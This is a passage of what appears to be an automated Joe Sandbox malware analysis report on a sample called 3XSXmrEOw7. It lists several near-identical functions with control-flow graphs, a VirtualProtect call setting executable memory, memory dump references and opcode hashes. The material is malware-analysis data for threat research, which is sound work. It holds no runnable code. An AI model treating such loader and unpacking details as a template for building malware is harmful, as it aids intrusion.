                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                                              • Instruction ID: f40b09c2810a9fa6f02b2eec4802a077c4c1291dc3e09875bf3ed72bb553ef21
                                                                                                                                              • Opcode Fuzzy Hash: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                                              • Instruction Fuzzy Hash: 8EE135B1C042649AF7208624DC447EB7A79DF51314F1440FED98DA62C1DABE0FC68B67
                                                                                                                                              Function 00406E30 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 399COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 452 406e30-406e4d 453 406e52-406ece call 406e68 452->453 459 406ed0-406ee0 453->459 460 406ee5-406eef 453->460 465 406f68-406f6f 459->465 461 406ef5-406f02 460->461 462 406dde-406e4d 460->462 461->462 464 406f08-406f1f call 406f1b 461->464 462->453 466 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 464->466 476 406f21-406f44 464->476 465->466 467 406fb4-406fcb call 406fd0 465->467 499 408828-408a77 call 4089ff 466->499 500 4094b9-4095cb call 4094db call 40950b call 4095cc 466->500 480 406f52 476->480 481 406f46-406f50 476->481 482 406f5c-406f62 480->482 481->482 482->465 516 408a79-408ab5 499->516 517 408aba-408ae7 call 408ae8 499->517 530 409f60-409f62 ExitProcess 500->530 526 408e4f-408e56 516->526 517->526 527 408e58-408e94 526->527 528 408e99-408ecf call 408ed1 526->528 527->530 528->530
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                                              • Instruction ID: 220cd9281a29cea94c4a91926213e167e5dbe57d70c329742c206d8b20fd43a8
                                                                                                                                              • Opcode Fuzzy Hash: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                                              • Instruction Fuzzy Hash: E1E125A2C042649AF7208624DC44BEB7A78EF50314F1440FED94DA62C1D6BE5FC6CBA7
                                                                                                                                              Function 00406E40 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 393COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 535 406e40-406e4d 536 406e52-406ece call 406e68 535->536 542 406ed0-406ee0 536->542 543 406ee5-406eef 536->543 548 406f68-406f6f 542->548 544 406ef5-406f02 543->544 545 406dde-406e4d 543->545 544->545 547 406f08-406f1f call 406f1b 544->547 545->536 549 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 547->549 559 406f21-406f44 547->559 548->549 550 406fb4-406fcb call 406fd0 548->550 582 408828-408a77 call 4089ff 549->582 583 4094b9-4095cb call 4094db call 40950b call 4095cc 549->583 563 406f52 559->563 564 406f46-406f50 559->564 565 406f5c-406f62 563->565 564->565 565->548 599 408a79-408ab5 582->599 600 408aba-408ae7 call 408ae8 582->600 613 409f60-409f62 ExitProcess 583->613 609 408e4f-408e56 599->609 600->609 610 408e58-408e94 609->610 611 408e99-408ecf call 408ed1 609->611 610->613 611->613
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                                              • Instruction ID: 922c944672f40ff5276d803d9d834a580e9c1310f30415da19b8596a71a819f2
                                                                                                                                              • Opcode Fuzzy Hash: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                                              • Instruction Fuzzy Hash: 44E123A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67
                                                                                                                                              Function 00406E50 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 392memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 618 406e50-406e5d 619 406e60-406ece 618->619 622 406ed0-406ee0 619->622 623 406ee5-406eef 619->623 629 406f68-406f6f 622->629 624 406ef5-406f02 623->624 625 406dde-406e5d call 406e68 623->625 624->625 627 406f08-406f1f call 406f1b 624->627 625->619 630 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 627->630 642 406f21-406f44 627->642 629->630 631 406fb4-406fcb call 406fd0 629->631 665 408828-408a77 call 4089ff 630->665 666 4094b9-4095cb call 4094db call 40950b call 4095cc 630->666 646 406f52 642->646 647 406f46-406f50 642->647 648 406f5c-406f62 646->648 647->648 648->629 682 408a79-408ab5 665->682 683 408aba-408ae7 call 408ae8 665->683 696 409f60-409f62 ExitProcess 666->696 692 408e4f-408e56 682->692 683->692 693 408e58-408e94 692->693 694 408e99-408ecf call 408ed1 692->694 693->696 694->696
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                                              • Instruction ID: f472c5bf6cce1d32c270796867ad13836725e5baa778bd72db952dc4fd989fbb
                                                                                                                                              • Opcode Fuzzy Hash: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                                              • Instruction Fuzzy Hash: B9E134A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67
                                                                                                                                              Function 00407500 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 387memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 701 407500-407524 702 407535-407586 701->702 703 407526-407530 701->703 712 407594-4075c6 call 4075b5 702->712 713 407588 702->713 704 4075d0-4075d7 703->704 706 407619 704->706 707 4075d9-407631 704->707 706->706 718 4076d3-407714 call 407716 707->718 719 407637-407690 707->719 712->704 713->712 719->718 725 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 719->725 751 408828-408a77 call 4089ff 725->751 752 4094b9-4095cb call 4094db call 40950b call 4095cc 725->752 768 408a79-408ab5 751->768 769 408aba-408ae7 call 408ae8 751->769 782 409f60-409f62 ExitProcess 752->782 778 408e4f-408e56 768->778 769->778 779 408e58-408e94 778->779 780 408e99-408ecf call 408ed1 778->780 779->782 780->782
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                                              • Instruction ID: 08101456153ba46f1365cff4e30746e8e286d4fed58f6373a9dfc3cd762e9e30
                                                                                                                                              • Opcode Fuzzy Hash: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                                              • Instruction Fuzzy Hash: 32E133B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67
                                                                                                                                              Function 00407C35 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 384memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 787 407c35-407c4f 789 407c51-407c8f 787->789 790 407c94-407ca6 787->790 794 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 789->794 792 407ca8-407cb4 790->792 793 407cb9-407d0a call 407ce7 790->793 792->794 799 407d0c-407d4a 793->799 800 407d4f-407d90 793->800 827 408828-408a77 call 4089ff 794->827 828 4094b9-4095cb call 4094db call 40950b call 4095cc 794->828 799->794 806 407d92-407dd0 800->806 807 407dd5-407e99 800->807 806->794 812 408162-408168 807->812 813 407e9f-407eb5 call 407eb6 807->813 812->794 813->812 844 408a79-408ab5 827->844 845 408aba-408ae7 call 408ae8 827->845 858 409f60-409f62 ExitProcess 828->858 854 408e4f-408e56 844->854 845->854 855 408e58-408e94 854->855 856 408e99-408ecf call 408ed1 854->856 855->858 856->858
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                                              • Instruction ID: cf000f9f2d6c84c8d3ce0dac07b7f877c0778feaaefee545d6c19c651e8d1ed7
                                                                                                                                              • Opcode Fuzzy Hash: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                                              • Instruction Fuzzy Hash: F0E114B2D082689AF7208624DC44BEB7A68EF51314F1440FED94D67281D6BE1FC58BA7
                                                                                                                                              Function 004070E0 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 381COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
